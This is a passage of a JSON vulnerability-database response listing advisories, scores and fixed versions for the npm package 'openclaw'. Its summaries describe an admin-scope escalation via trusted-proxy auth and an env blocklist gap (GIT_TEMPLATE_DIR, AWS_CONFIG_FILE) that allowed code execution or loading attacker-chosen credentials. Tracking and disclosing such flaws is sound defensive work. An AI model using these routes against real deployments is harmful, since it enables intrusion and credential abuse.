ity":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerabil
ity":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerabil
ity":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerabil
ity":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerabil
ity":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerabil
ity":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32977","GHSA-xvx8-77m6-gwg6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b7hq-mrhg-b3bk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89033?format=json","vulnerability_id":"VCID-b9w3-w2nq-cqg6","summary":"OpenClaw: Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n## Summary\nIncomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n\n## Current Maintainer Triage\n- Normalized severity: high\n- Assessment: v2026.3.28 still misses 
trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8b88b927cb0747ad24d95b07d35682bf85dc5b0e` — 2026-03-30T14:19:00+01:00\n\nOpenClaw thanks @north-echo for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41404","reference_id":"","reference_type":"","scores":[{"value":"0.00114","scoring_system":"epss","scoring_elements":"0.29702","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00114","scoring_system":"epss","scoring_elements":"0.29632","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00114","scoring_system":"epss","scoring_elements":"0.29665","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41404"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_text
ual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41404","reference_id":"CVE-2026-41404","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41404"},{"reference_url":"https://github.com/advisories/GHSA-g374-mggx-p6xc","reference_id":"GHSA-g374-mggx-p6xc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g374-mggx-p6xc"},{"reference_url":"https://www.vulncheck.com/
advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication","reference_id":"openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"
vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"
vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41404","GHSA-g374-mggx-p6xc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b9w3-w2nq-cqg6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91029?format=json","vulnerability_id":"VCID-bg1d-gmxy-wkc6","summary":"OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override\n## Summary\n\nHost execution env sanitization did not block `GIT_TEMPLATE_DIR` or `AWS_CONFIG_FILE`, even though both can redirect trusted tooling to attacker-controlled content.\n\n## Impact\n\nAn approved exec request could redirect git or AWS CLI behavior through attacker-controlled configuration and execute untrusted code or load attacker-selected credentials.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json, src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6eb82fba3c` (`Infra: block additional host exec env keys`).\n\nOpenClaw 
thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41332","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05589","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05576","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05574","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41332"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scor